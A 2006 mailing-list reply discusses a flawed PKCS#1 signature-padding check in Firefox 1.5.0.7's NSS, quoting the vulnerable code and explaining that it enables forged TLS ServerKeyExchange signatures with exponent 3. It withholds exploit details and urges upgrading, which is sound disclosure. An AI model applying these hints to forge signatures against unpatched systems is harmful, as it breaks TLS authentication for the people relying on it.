> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] 
> Sent: Sonntag, 17. September 2006 06:01
> 
> For another example of just how badly this kind of thing can 
> be done, look at this code excerpt from Firefox version 
> 1.5.0.7, which is the fixed version.  There are two PKCS-1 
> parsing functions, one which returns the hash and its prefix, 
> the other of which is given the hash and asked whether it 
> matches the RSA-signed value.  This is from the latter one:
> 
>     /*
>      * check the padding that was used
>      */
>     if (buffer[0] != 0 || buffer[1] != 1)
>         goto loser;
>     for (i = 2; i < modulus_len - hash_len - 1; i++) {
>         if (buffer[i] == 0)
>             break;
>         if (buffer[i] != 0xff)
>             goto loser;
>     }
> 
>     /*
>      * make sure we get the same results
>      */
>     if (PORT_Memcmp(buffer + modulus_len - hash_len, hash, 
> hash_len) != 0)
>         goto loser;
> 
>     PORT_Free(buffer);
>     return SECSuccess;
> 
> Here, buffer holds the result of the RSA exponentiation, of 
> size modulus_len, and we are passed hash of size hash_len to compare.
> 
> I don't think this code is used, fortunately.  It will accept 
> anything of the form 0, 1, 0, garbage, hash.  Just goes to 
> show how easy it is to get this kind of parsing wrong.
> 

Unfortunately, this code _is_ used! It took me quite a while to understand 
under what circumstances, but here is the result. The problem is fixed as of 
version 1.5.0.8 (out now). Interestingly, the mozilla people fixed it by 
themselves in the 2.0 version (and any public beta I could find), but for the 
1.5 version it took my bug report...

So here is how the code is used and some hints (I am reluctant to give out the 
details right now, given that there are still many vulnerable systems out 
there. However, I am sure you can easily work out the details):

Whenever a SSL or TLS server send a ServerKeyExchange message, the key 
contained in there is signed with a fresh nonce. This signature is checked 
using RSA_CheckSign(). 

Faking a signature for a key with a small exponent like 3 is easy. This can be 
used to break the SSL/TLS authentication.

Better upgrade asap...

Regards,
Ulrich

---------------------------------------------------------------------
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]

Reply via email to